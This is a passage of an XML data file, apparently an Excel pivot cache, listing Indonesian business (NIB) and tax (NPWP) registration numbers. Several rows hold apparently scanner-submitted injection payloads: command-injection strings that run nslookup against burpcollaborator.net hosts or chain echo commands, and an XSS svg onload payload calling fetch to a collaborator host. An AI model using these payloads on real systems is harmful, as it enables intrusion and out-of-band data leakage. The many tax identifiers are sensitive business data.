    <x v="4065"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4066"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4067"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4068"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4069"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4070"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4071"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4072"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4073"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4074"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4075"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4076"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4077"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4078"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4079"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4080"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4081"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4082"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4083"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4084"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4085"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4086"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4087"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4088"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4089"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4090"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4091"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4092"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4093"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4094"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4095"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4096"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4097"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4098"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4099"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4100"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4101"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4102"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4103"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4104"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4105"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4106"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4107"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4108"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4109"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4110"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4111"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4112"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4113"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4114"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4115"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4116"/>
    <s v="nib"/>
    <s v="nslookup -q=cname zuxppmswt4n0k72nnj2xwfj55wbuzkndq1iogc5.burpcollaborator.net.&amp;"/>
  </r>
  <r>
    <x v="4117"/>
    <s v="nib"/>
    <s v="1234|nslookup -q=cname p5vf0c3m4uyqvxddy9dn75uvgmmkaay6my9wxl.burpcollaborator.net.&amp;"/>
  </r>
  <r>
    <x v="4118"/>
    <s v="nib"/>
    <s v="1234'&quot;`0&amp;nslookup -q=cname m1ocw9zj0runru9au69k32qscjih67u4iw5utj.burpcollaborator.net.&amp;`'"/>
  </r>
  <r>
    <x v="4119"/>
    <s v="nib"/>
    <s v="1234&amp;nslookup -q=cname ivh8q5tfunojlq36o23gxyko6fcd03oycqzond.burpcollaborator.net.&amp;'\&quot;`0&amp;nslookup -q=cname ivh8q5tfunojlq36o23gxyko6fcd03oycqzond.burpcollaborator.net.&amp;`'"/>
  </r>
  <r>
    <x v="4120"/>
    <s v="nib"/>
    <s v="1234|echo n9i9davl8b ctv18mbx4a||a #' |echo n9i9davl8b ctv18mbx4a||a #|&quot; |echo n9i9davl8b ctv18mbx4a||a #"/>
  </r>
  <r>
    <x v="4121"/>
    <s v="nib"/>
    <s v="1234&amp;echo u05imk62nv fd72rxy1bv&amp;"/>
  </r>
  <r>
    <x v="4122"/>
    <s v="nib"/>
    <s v="1234&quot;|echo 2n3si8kn4m h6fxj430s2 ||"/>
  </r>
  <r>
    <x v="4123"/>
    <s v="nib"/>
    <s v="1234'|echo 0he76dp7d8 7zk8hi3igz #xzwx"/>
  </r>
  <r>
    <x v="4124"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4125"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4126"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4127"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4128"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4129"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4130"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4131"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4132"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4133"/>
    <s v="nib"/>
    <s v="l5rb083i4qymvtd9y5dj71urgimga6yyqmi9gx5"/>
  </r>
  <r>
    <x v="4134"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4135"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4136"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4137"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4138"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4139"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4140"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4141"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4142"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4143"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4144"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4145"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4146"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4147"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4148"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4149"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4150"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4151"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4152"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4153"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4154"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4155"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4156"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4157"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4158"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4159"/>
    <s v="nib"/>
    <s v="'&quot;&gt;&amp;lt;svg/onload=fetch`//8y7ytvw5xdr9og6wrs660one95f33trlh99w7kw\.burpcollaborator.net`&amp;gt;"/>
  </r>
  <r>
    <x v="4160"/>
    <s v="nib"/>
    <s v="[removed]/*[removed]&lt;img xss=removed&gt;"/>
  </r>
  <r>
    <x v="4161"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4162"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4163"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4164"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4165"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4166"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4167"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4168"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4169"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4170"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4171"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4172"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4173"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4174"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4175"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4176"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4177"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="4178"/>
    <s v="nib"/>
    <n v="1234"/>
  </r>
  <r>
    <x v="148"/>
    <s v="nib"/>
    <n v="8120115070542"/>
  </r>
  <r>
    <x v="625"/>
    <s v="nib"/>
    <n v="8120206830312"/>
  </r>
  <r>
    <x v="938"/>
    <s v="nib"/>
    <n v="9120208431209"/>
  </r>
  <r>
    <x v="4179"/>
    <s v="nib"/>
    <n v="220006680732"/>
  </r>
  <r>
    <x v="296"/>
    <s v="nib"/>
    <n v="8120019130395"/>
  </r>
  <r>
    <x v="570"/>
    <s v="nib"/>
    <n v="8120014161372"/>
  </r>
  <r>
    <x v="4180"/>
    <s v="nib"/>
    <n v="264010152409"/>
  </r>
  <r>
    <x v="4181"/>
    <s v="nib"/>
    <n v="9120019250039"/>
  </r>
  <r>
    <x v="3991"/>
    <s v="npwp"/>
    <s v="84.743.114.5-832.000"/>
  </r>
  <r>
    <x v="4182"/>
    <s v="nib"/>
    <n v="220004640656"/>
  </r>
  <r>
    <x v="348"/>
    <s v="nib"/>
    <n v="8120012010324"/>
  </r>
  <r>
    <x v="4183"/>
    <s v="nib"/>
    <n v="9120205241655"/>
  </r>
  <r>
    <x v="4184"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1124"/>
    <s v="nib"/>
    <n v="8120200921691"/>
  </r>
  <r>
    <x v="4185"/>
    <s v="nib"/>
    <n v="8120204902602"/>
  </r>
  <r>
    <x v="850"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1863"/>
    <s v="npwp"/>
    <s v="01.360.591.0-007.000"/>
  </r>
  <r>
    <x v="455"/>
    <s v="nib"/>
    <n v="9120019250039"/>
  </r>
  <r>
    <x v="4186"/>
    <s v="nib"/>
    <n v="220202401647"/>
  </r>
  <r>
    <x v="646"/>
    <s v="nib"/>
    <n v="9120202172782"/>
  </r>
  <r>
    <x v="831"/>
    <s v="nib"/>
    <n v="8120210221782"/>
  </r>
  <r>
    <x v="1998"/>
    <s v="npwp"/>
    <s v="90.722.802.7-642.000"/>
  </r>
  <r>
    <x v="722"/>
    <s v="nib"/>
    <n v="8120013021406"/>
  </r>
  <r>
    <x v="806"/>
    <s v="nib"/>
    <n v="8120008802502"/>
  </r>
  <r>
    <x v="661"/>
    <s v="nib"/>
    <n v="9120011043716"/>
  </r>
  <r>
    <x v="4187"/>
    <s v="nib"/>
    <n v="9120109361123"/>
  </r>
  <r>
    <x v="4180"/>
    <s v="npwp"/>
    <s v="81.402.152.3-215.000"/>
  </r>
  <r>
    <x v="4188"/>
    <s v="nib"/>
    <n v="8120010262107"/>
  </r>
  <r>
    <x v="4189"/>
    <s v="nib"/>
    <n v="9120101490623"/>
  </r>
  <r>
    <x v="2258"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="834"/>
    <s v="nib"/>
    <n v="8120014240548"/>
  </r>
  <r>
    <x v="4190"/>
    <s v="nib"/>
    <n v="220003292344"/>
  </r>
  <r>
    <x v="4191"/>
    <s v="nib"/>
    <n v="9120405940825"/>
  </r>
  <r>
    <x v="141"/>
    <s v="nib"/>
    <n v="8120301800617"/>
  </r>
  <r>
    <x v="4192"/>
    <s v="nib"/>
    <n v="220005512809"/>
  </r>
  <r>
    <x v="4191"/>
    <s v="npwp"/>
    <s v="01.221.074.6-402.000"/>
  </r>
  <r>
    <x v="4193"/>
    <s v="nib"/>
    <n v="8120102902081"/>
  </r>
  <r>
    <x v="4190"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2254"/>
    <s v="npwp"/>
    <n v="30849491033000"/>
  </r>
  <r>
    <x v="819"/>
    <s v="nib"/>
    <n v="8120202860998"/>
  </r>
  <r>
    <x v="1943"/>
    <s v="npwp"/>
    <s v="93.974.594.9-543.000"/>
  </r>
  <r>
    <x v="2113"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4194"/>
    <s v="nib"/>
    <n v="8120004801168"/>
  </r>
  <r>
    <x v="108"/>
    <s v="nib"/>
    <n v="8120105891306"/>
  </r>
  <r>
    <x v="1000"/>
    <s v="nib"/>
    <n v="8120105950451"/>
  </r>
  <r>
    <x v="4193"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4195"/>
    <s v="nib"/>
    <n v="9120009840385"/>
  </r>
  <r>
    <x v="4196"/>
    <s v="nib"/>
    <n v="9120005930932"/>
  </r>
  <r>
    <x v="4196"/>
    <s v="npwp"/>
    <n v="316280775922000"/>
  </r>
  <r>
    <x v="999"/>
    <s v="nib"/>
    <n v="8120003801742"/>
  </r>
  <r>
    <x v="4197"/>
    <s v="nib"/>
    <n v="8120119222762"/>
  </r>
  <r>
    <x v="501"/>
    <s v="nib"/>
    <n v="220002640856"/>
  </r>
  <r>
    <x v="4198"/>
    <s v="nib"/>
    <n v="9120005192752"/>
  </r>
  <r>
    <x v="2197"/>
    <s v="npwp"/>
    <s v="14.321.499.7-214.000"/>
  </r>
  <r>
    <x v="4199"/>
    <s v="nib"/>
    <n v="9120408921502"/>
  </r>
  <r>
    <x v="4199"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4194"/>
    <s v="npwp"/>
    <n v="855549556643000"/>
  </r>
  <r>
    <x v="4200"/>
    <s v="nib"/>
    <n v="9120102350549"/>
  </r>
  <r>
    <x v="4198"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="1094"/>
    <s v="nib"/>
    <n v="8120317041465"/>
  </r>
  <r>
    <x v="4201"/>
    <s v="nib"/>
    <n v="9120204811139"/>
  </r>
  <r>
    <x v="4202"/>
    <s v="nib"/>
    <n v="220109451473"/>
  </r>
  <r>
    <x v="4203"/>
    <s v="nib"/>
    <n v="220001601253"/>
  </r>
  <r>
    <x v="4204"/>
    <s v="nib"/>
    <n v="8120101920146"/>
  </r>
  <r>
    <x v="4205"/>
    <s v="nib"/>
    <n v="220004201693"/>
  </r>
  <r>
    <x v="4206"/>
    <s v="nib"/>
    <n v="8120211160919"/>
  </r>
  <r>
    <x v="4207"/>
    <s v="nib"/>
    <n v="8120006900273"/>
  </r>
  <r>
    <x v="4208"/>
    <s v="nib"/>
    <n v="220104621768"/>
  </r>
  <r>
    <x v="4209"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4209"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4195"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4210"/>
    <s v="nib"/>
    <n v="9120200141153"/>
  </r>
  <r>
    <x v="4206"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4211"/>
    <s v="nib"/>
    <n v="220202681505"/>
  </r>
  <r>
    <x v="863"/>
    <s v="nib"/>
    <n v="8120102801461"/>
  </r>
  <r>
    <x v="4212"/>
    <s v="nib"/>
    <n v="8120107830031"/>
  </r>
  <r>
    <x v="4213"/>
    <s v="nib"/>
    <n v="9120000212056"/>
  </r>
  <r>
    <x v="4214"/>
    <s v="nib"/>
    <n v="91202074880225"/>
  </r>
  <r>
    <x v="2237"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4215"/>
    <s v="nib"/>
    <n v="220104622534"/>
  </r>
  <r>
    <x v="4216"/>
    <s v="nib"/>
    <n v="9120014152781"/>
  </r>
  <r>
    <x v="589"/>
    <s v="nib"/>
    <n v="9120308122931"/>
  </r>
  <r>
    <x v="4183"/>
    <s v="npwp"/>
    <s v="01.393.081.3-044.000"/>
  </r>
  <r>
    <x v="4217"/>
    <s v="nib"/>
    <n v="9120102211354"/>
  </r>
  <r>
    <x v="4218"/>
    <s v="nib"/>
    <n v="220000612658"/>
  </r>
  <r>
    <x v="2154"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4219"/>
    <s v="nib"/>
    <n v="8120017221293"/>
  </r>
  <r>
    <x v="4220"/>
    <s v="nib"/>
    <n v="9120202760085"/>
  </r>
  <r>
    <x v="569"/>
    <s v="nib"/>
    <n v="9120201550068"/>
  </r>
  <r>
    <x v="4221"/>
    <s v="nib"/>
    <n v="220002242595"/>
  </r>
  <r>
    <x v="4222"/>
    <s v="nib"/>
    <n v="220005602359"/>
  </r>
  <r>
    <x v="4201"/>
    <s v="npwp"/>
    <s v="81.104.778.6-541.000"/>
  </r>
  <r>
    <x v="4203"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4223"/>
    <s v="nib"/>
    <n v="9120204231517"/>
  </r>
  <r>
    <x v="4207"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4224"/>
    <s v="nib"/>
    <n v="9120304772692"/>
  </r>
  <r>
    <x v="4225"/>
    <s v="nib"/>
    <n v="9120005510018"/>
  </r>
  <r>
    <x v="4226"/>
    <s v="nib"/>
    <n v="8120017021605"/>
  </r>
  <r>
    <x v="754"/>
    <s v="nib"/>
    <n v="8120017021605"/>
  </r>
  <r>
    <x v="796"/>
    <s v="nib"/>
    <n v="9120207222963"/>
  </r>
  <r>
    <x v="4227"/>
    <s v="nib"/>
    <n v="220105463303"/>
  </r>
  <r>
    <x v="4223"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4228"/>
    <s v="nib"/>
    <n v="9120313072117"/>
  </r>
  <r>
    <x v="4229"/>
    <s v="nib"/>
    <n v="220102502086"/>
  </r>
  <r>
    <x v="4210"/>
    <s v="npwp"/>
    <s v="01.000.065.1-613.001"/>
  </r>
  <r>
    <x v="4197"/>
    <s v="npwp"/>
    <n v="343304788121000"/>
  </r>
  <r>
    <x v="4225"/>
    <s v="npwp"/>
    <n v="754239556702000"/>
  </r>
  <r>
    <x v="4230"/>
    <s v="nib"/>
    <n v="9120301952968"/>
  </r>
  <r>
    <x v="4231"/>
    <s v="nib"/>
    <n v="220106131459"/>
  </r>
  <r>
    <x v="4232"/>
    <s v="nib"/>
    <n v="220009582095"/>
  </r>
  <r>
    <x v="4221"/>
    <s v="npwp"/>
    <s v="94.498.629.8-213.000"/>
  </r>
  <r>
    <x v="4233"/>
    <s v="nib"/>
    <n v="9120104252475"/>
  </r>
  <r>
    <x v="4234"/>
    <s v="nib"/>
    <n v="261010190059"/>
  </r>
  <r>
    <x v="4184"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4235"/>
    <s v="nib"/>
    <n v="220104612094"/>
  </r>
  <r>
    <x v="4220"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4219"/>
    <s v="npwp"/>
    <s v="03.323.599.5-112.000"/>
  </r>
  <r>
    <x v="4236"/>
    <s v="nib"/>
    <n v="8120000962624"/>
  </r>
  <r>
    <x v="4237"/>
    <s v="nib"/>
    <n v="8120006890397"/>
  </r>
  <r>
    <x v="4238"/>
    <s v="nib"/>
    <n v="8120010130156"/>
  </r>
  <r>
    <x v="4239"/>
    <s v="nib"/>
    <n v="220301691484"/>
  </r>
  <r>
    <x v="4240"/>
    <s v="nib"/>
    <n v="8120006722804"/>
  </r>
  <r>
    <x v="4240"/>
    <s v="npwp"/>
    <s v="01.569.027.4-062.000"/>
  </r>
  <r>
    <x v="4241"/>
    <s v="nib"/>
    <n v="220003461869"/>
  </r>
  <r>
    <x v="4242"/>
    <s v="nib"/>
    <n v="9120103192646"/>
  </r>
  <r>
    <x v="4236"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4204"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4233"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4243"/>
    <s v="nib"/>
    <n v="220208671185"/>
  </r>
  <r>
    <x v="4238"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="587"/>
    <s v="nib"/>
    <n v="8120203970979"/>
  </r>
  <r>
    <x v="4244"/>
    <s v="nib"/>
    <n v="9120014110339"/>
  </r>
  <r>
    <x v="4245"/>
    <s v="nib"/>
    <n v="9120212291594"/>
  </r>
  <r>
    <x v="4246"/>
    <s v="nib"/>
    <n v="220107670643"/>
  </r>
  <r>
    <x v="4247"/>
    <s v="nib"/>
    <n v="8120005871564"/>
  </r>
  <r>
    <x v="4248"/>
    <s v="nib"/>
    <n v="8120014002439"/>
  </r>
  <r>
    <x v="4249"/>
    <s v="nib"/>
    <n v="8120202880293"/>
  </r>
  <r>
    <x v="4235"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4250"/>
    <s v="nib"/>
    <n v="9120200331356"/>
  </r>
  <r>
    <x v="4208"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="885"/>
    <s v="nib"/>
    <n v="8120004873214"/>
  </r>
  <r>
    <x v="4245"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4251"/>
    <s v="nib"/>
    <n v="8120312051279"/>
  </r>
  <r>
    <x v="4252"/>
    <s v="nib"/>
    <n v="9120207592323"/>
  </r>
  <r>
    <x v="4253"/>
    <s v="nib"/>
    <n v="8120100702435"/>
  </r>
  <r>
    <x v="4254"/>
    <s v="nib"/>
    <n v="220100541653"/>
  </r>
  <r>
    <x v="533"/>
    <s v="nib"/>
    <n v="8120009802176"/>
  </r>
  <r>
    <x v="4232"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4255"/>
    <s v="nib"/>
    <n v="220002750364"/>
  </r>
  <r>
    <x v="4256"/>
    <s v="nib"/>
    <n v="9120015021409"/>
  </r>
  <r>
    <x v="4243"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4257"/>
    <s v="nib"/>
    <n v="8120005861765"/>
  </r>
  <r>
    <x v="4258"/>
    <s v="nib"/>
    <n v="8120001721627"/>
  </r>
  <r>
    <x v="4259"/>
    <s v="nib"/>
    <n v="220008790931"/>
  </r>
  <r>
    <x v="538"/>
    <s v="nib"/>
    <n v="9120503701683"/>
  </r>
  <r>
    <x v="4260"/>
    <s v="nib"/>
    <n v="8120000701137"/>
  </r>
  <r>
    <x v="4261"/>
    <s v="nib"/>
    <n v="9120400872497"/>
  </r>
  <r>
    <x v="4262"/>
    <s v="nib"/>
    <n v="220104612094"/>
  </r>
  <r>
    <x v="4231"/>
    <s v="npwp"/>
    <s v="94.006.466.0-522.000"/>
  </r>
  <r>
    <x v="4239"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4263"/>
    <s v="nib"/>
    <n v="8120105970633"/>
  </r>
  <r>
    <x v="4263"/>
    <s v="npwp"/>
    <s v="82.047.663.8-113.000"/>
  </r>
  <r>
    <x v="4258"/>
    <s v="npwp"/>
    <s v="01.343.593.8.046.000"/>
  </r>
  <r>
    <x v="4257"/>
    <s v="npwp"/>
    <s v="02.682.022.5-047.000"/>
  </r>
  <r>
    <x v="4264"/>
    <s v="nib"/>
    <n v="220104621768"/>
  </r>
  <r>
    <x v="4265"/>
    <s v="nib"/>
    <n v="9120218022623"/>
  </r>
  <r>
    <x v="4266"/>
    <s v="nib"/>
    <n v="8120217002652"/>
  </r>
  <r>
    <x v="4253"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4266"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4267"/>
    <s v="nib"/>
    <n v="9120007662543"/>
  </r>
  <r>
    <x v="4256"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4259"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="572"/>
    <s v="nib"/>
    <n v="8120100912045"/>
  </r>
  <r>
    <x v="240"/>
    <s v="nib"/>
    <n v="9120102153607"/>
  </r>
  <r>
    <x v="4251"/>
    <s v="npwp"/>
    <s v="01.412.488.7-812.000"/>
  </r>
  <r>
    <x v="4268"/>
    <s v="nib"/>
    <n v="8120003752084"/>
  </r>
  <r>
    <x v="4267"/>
    <s v="npwp"/>
    <s v="01.920.207.6-003.000"/>
  </r>
  <r>
    <x v="804"/>
    <s v="nib"/>
    <n v="8120100850114"/>
  </r>
  <r>
    <x v="4260"/>
    <s v="npwp"/>
    <s v="70.039.424.0-801.001"/>
  </r>
  <r>
    <x v="4269"/>
    <s v="nib"/>
    <n v="9120001450741"/>
  </r>
  <r>
    <x v="4270"/>
    <s v="nib"/>
    <n v="220109692653"/>
  </r>
  <r>
    <x v="4271"/>
    <s v="nib"/>
    <n v="9120006742787"/>
  </r>
  <r>
    <x v="4272"/>
    <s v="nib"/>
    <n v="8120001971052"/>
  </r>
  <r>
    <x v="2269"/>
    <s v="npwp"/>
    <n v="140056326224000"/>
  </r>
  <r>
    <x v="4216"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2245"/>
    <s v="npwp"/>
    <n v="945768315068000"/>
  </r>
  <r>
    <x v="4229"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4228"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="822"/>
    <s v="nib"/>
    <n v="8120310150762"/>
  </r>
  <r>
    <x v="4273"/>
    <s v="nib"/>
    <n v="8120017271423"/>
  </r>
  <r>
    <x v="4274"/>
    <s v="nib"/>
    <n v="9120013020893"/>
  </r>
  <r>
    <x v="4275"/>
    <s v="nib"/>
    <n v="8120015280138"/>
  </r>
  <r>
    <x v="4276"/>
    <s v="nib"/>
    <n v="8120016203718"/>
  </r>
  <r>
    <x v="4246"/>
    <s v="npwp"/>
    <s v="46.199.916.1-542.000"/>
  </r>
  <r>
    <x v="4269"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="534"/>
    <s v="nib"/>
    <n v="9120008172413"/>
  </r>
  <r>
    <x v="2201"/>
    <s v="npwp"/>
    <n v="827926684621001"/>
  </r>
  <r>
    <x v="4277"/>
    <s v="nib"/>
    <n v="220009632945"/>
  </r>
  <r>
    <x v="4278"/>
    <s v="nib"/>
    <n v="220009632945"/>
  </r>
  <r>
    <x v="4279"/>
    <s v="nib"/>
    <n v="220101640946"/>
  </r>
  <r>
    <x v="4280"/>
    <s v="nib"/>
    <n v="220101640946"/>
  </r>
  <r>
    <x v="845"/>
    <s v="nib"/>
    <n v="9120205721752"/>
  </r>
  <r>
    <x v="4281"/>
    <s v="nib"/>
    <n v="9120005982287"/>
  </r>
  <r>
    <x v="4282"/>
    <s v="nib"/>
    <n v="8120203932369"/>
  </r>
  <r>
    <x v="4227"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4283"/>
    <s v="nib"/>
    <n v="9120205241655"/>
  </r>
  <r>
    <x v="4284"/>
    <s v="nib"/>
    <n v="9120203381344"/>
  </r>
  <r>
    <x v="691"/>
    <s v="nib"/>
    <n v="8120101902214"/>
  </r>
  <r>
    <x v="4285"/>
    <s v="nib"/>
    <n v="9120115260926"/>
  </r>
  <r>
    <x v="15"/>
    <s v="nib"/>
    <n v="8120212290061"/>
  </r>
  <r>
    <x v="4272"/>
    <s v="npwp"/>
